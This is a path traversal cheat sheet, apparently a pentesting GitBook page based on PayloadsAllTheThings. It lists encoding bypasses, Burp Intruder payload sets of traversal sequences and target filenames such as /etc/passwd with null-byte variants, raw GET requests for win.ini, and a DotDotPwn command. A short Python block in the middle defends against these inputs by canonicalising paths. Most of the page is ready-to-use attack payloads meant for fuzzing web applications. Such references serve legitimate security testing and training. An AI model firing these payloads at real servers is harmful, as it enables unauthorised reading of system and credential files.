# Path Traversal

A directory traversal vulnerability can be present inside **a web server,** inside **an application framework** (during the HTTP request pre-processing and routing), or within **an application endpoint** that processes data according to application logic (for example, reading a file from storage based on its name).

## Platform - Filename and Path

You need to identify the platform in order to know how to address specific files. On Linux, a good file to read is `/etc/passwd`, which is readable on every system. On Windows, you can choose `C:\Windows\win.ini`.

## Simple

```
../../../etc/passwd
```

## URL encoding

```
. = %2e
/ = %2f
\ = %5c
```

## Double URL encoding

```
. = %252e
/ = %252f
\ = %255c
```

## UTF-8 Unicode

```
. = %c0%2e, %e0%40%ae, %c0ae
/ = %c0%af, %e0%80%af, %c0%2f
\ = %c0%5c, %c0%80%5c
```

## 16 bit Unicode

```
. = %u002e
/ = %u2215
\ = %u2216
```

## Bypass Path Sequence

```
../
.../
..../
..\
..\/
..;/
..././
...\.\
%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215
%uff0e%uff0e%u2216
```
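A defender-side view of the encodings and sequences above, as an added example that is not part of the original cheat sheet: a strip-once filter (the kind that `....//` and `..././` collapse back to `../` against) beside a validator that decodes exactly once, rejects anything still encoded, and compares the canonical path against the base directory. `strip_once_sanitizer`, `resolve_safely` and `all_results_inside_base` are hypothetical names, and `/var/www/files` is a constructed base directory.

```python
import posixpath
from urllib.parse import unquote

# Sequences from the cheat sheet above, reused here only as test input.
BYPASS_SEQUENCES = [
    "../", ".../", "..../", "..\\", "..\\/", "..;/", "..././", "...\\.\\",
    "%2e%2e%2f", "%252e%252e%252f", "%c0%ae%c0%ae%c0%af",
    "%uff0e%uff0e%u2215", "%uff0e%uff0e%u2216",
]


def strip_once_sanitizer(user_path: str) -> str:
    """The weak filter that '....//' and '..././' are built for: deleting every
    literal '../' a single time collapses both of them back to '../'."""
    return user_path.replace("../", "")


def resolve_safely(base_dir: str, user_path: str):
    """Return the canonical path of base_dir/user_path when it stays inside
    base_dir, otherwise None. Hypothetical helper written for this page.
    It validates; it never strips or rewrites the input."""
    try:
        # Exactly one round of %xx decoding. Invalid UTF-8 such as the overlong
        # %c0%ae / %c0%af forms raises here instead of being quietly accepted.
        decoded = unquote(user_path, errors="strict")
    except UnicodeDecodeError:
        return None
    # A '%' surviving one decode means double encoding (%252e) or a %uXXXX form
    # this code never interprets; backslash, ';' and NUL have no place in a
    # relative filename either. Reject rather than guess what a server might do.
    if any(ch in decoded for ch in ("%", "\\", ";", "\x00")):
        return None
    base = posixpath.normpath(base_dir)
    full = posixpath.normpath(posixpath.join(base, decoded))
    # Compare after canonicalisation so '..' components are already collapsed.
    # Names like '...' or '....' are ordinary directories and stay inside base;
    # they only turn into traversal when a filter rewrites them.
    if posixpath.commonpath([base, full]) != base:
        return None
    return full


def all_results_inside_base(base_dir: str, filename: str = "etc/passwd") -> bool:
    """True when every listed sequence is either rejected or resolves inside base_dir."""
    base = posixpath.normpath(base_dir)
    for seq in BYPASS_SEQUENCES:
        resolved = resolve_safely(base_dir, seq + filename)
        if resolved is not None and not resolved.startswith(base + "/"):
            return False
    return True
```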

### Intruder

![](https://1354665097-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MYLPTPmXutfLTHzDEhx%2Fuploads%2FWzGT8dM3f1kqi7gL6RPV%2Fimage.png?alt=media\&token=82bc9700-5dc8-4f17-9010-44d7d9c4489c)

Don't forget to disable URL encoding in Intruder for both of the following payload sets (Payload 1, Payload 2).

![](https://1354665097-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MYLPTPmXutfLTHzDEhx%2Fuploads%2FXa1zIqJokGIOqk1Ze76V%2Fimage.png?alt=media\&token=032d0726-b33b-4732-b9f9-98f882075454)

### Payload 1 - Directory traversal sequences, depth 6

```
../
../../
../../../
../../../../
../../../../../
../../../../../../
.../
.../.../
.../.../.../
.../.../.../.../
.../.../.../.../.../
.../.../.../.../.../.../
...//
...//...//
...//...//...//
...//...//...//...//
...//...//...//...//...//
...//...//...//...//...//...//
....//....//
....//....//....//
....//....//....//....//
....//....//....//....//....//
....//....//....//....//....//....//
..\
..\..\
..\..\..\
..\..\..\..\
..\..\..\..\..\
..\..\..\..\..\..\
...\
...\...\
...\...\...\
...\...\...\...\
...\...\...\...\...\
...\...\...\...\...\...\
....\\....\\
....\\....\\....\\
....\\....\\....\\....\\
....\\....\\....\\....\\....\\
....\\....\\....\\....\\....\\....\\
....\/
....\/....\/
....\/....\/....\/
....\/....\/....\/....\/
....\/....\/....\/....\/....\/
....\/....\/....\/....\/....\/....\/
..\/
..\/..\/
..\/..\/..\/
..\/..\/..\/..\/
..\/..\/..\/..\/..\/
..\/..\/..\/..\/..\/..\/
..;/
..;/..;/
..;/..;/..;/
..;/..;/..;/..;/
..;/..;/..;/..;/..;/
..;/..;/..;/..;/..;/..;/
..././
..././..././
..././..././..././
..././..././..././..././
..././..././..././..././..././
..././..././..././..././..././..././
...\.\
...\.\...\.\
...\.\...\.\...\.\
...\.\...\.\...\.\...\.\
...\.\...\.\...\.\...\.\...\.\
...\.\...\.\...\.\...\.\...\.\...\.\
%2e%2e%2f
%2e%2e%2f%2e%2e%2f
%2e%2e%2f%2e%2e%2f%2e%2e%2f
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f
%252e%252e%252f
%252e%252e%252f%252e%252e%252f
%252e%252e%252f%252e%252e%252f%252e%252e%252f
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f
..%c0%af
..%c0%af..%c0%af
..%c0%af..%c0%af..%c0%af
..%c0%af..%c0%af..%c0%af..%c0%af
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af
..%ef%bc%8f
..%ef%bc%8f..%ef%bc%8f
..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f
..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f
..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f
..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f
%c0%ae%c0%ae%c0%af
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215
%uff0e%uff0e%u2215%uff0e%uff0e%u2215
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215
%uff0e%uff0e%u2216
%uff0e%uff0e%u2216%uff0e%uff0e%u2216
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216
```

### Payload 2 - Filename

```
etc/passwd
etc/passwd%00
etc/passwd%00.jpg
etc/passwd%00.png
etc//passwd
etc\passwd
etc\\passwd
etc%2fpasswd
etc%252fpasswd
etc%c0%afpasswd
etc%c0%af%e0%80%afpasswd
etc%c0%2fpasswd
etc%c0%5cpasswd
etc%c0%80%5cpasswd
etc%u2215passwd
etc%u2216passwd
home/carlos/secret
home/carlos/secret%00
home/carlos/secret%00.jpg
home/carlos/secret%00.png
home//carlos//secret
home\carlos\secret
home\\carlos\\secret
home%2fcarlos%2fsecret
home%252fcarlos%252fsecret
home%c0%afcarlos%c0%afsecret
home%c0%af%e0%80%afcarlos%c0%af%e0%80%afsecret
home%c0%2fcarlos%c0%2fsecret
home%c0%5ccarlos%c0%5csecret
home%c0%80%5ccarlos%c0%80%5csecret
home%u2215carlos%u2215secret
home%u2216carlos%u2216secret
```

## Web Server Path Traversal Attacks

```
GET C:/Windows/win.ini
GET /C:/Windows/win.ini
GET file:///Windows/win.ini
GET /~/Windows/win.ini
```

## Tools

### DotDotPwn

```
dotdotpwn -m http-url -u https://example.com/TRAVERSAL -f /etc/passwd -k root
```

## References

<https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Directory%20Traversal>\
<https://gracefulsecurity.com/path-traversal-cheat-sheet-linux/>\
<https://www.kali.org/tools/dotdotpwn/>
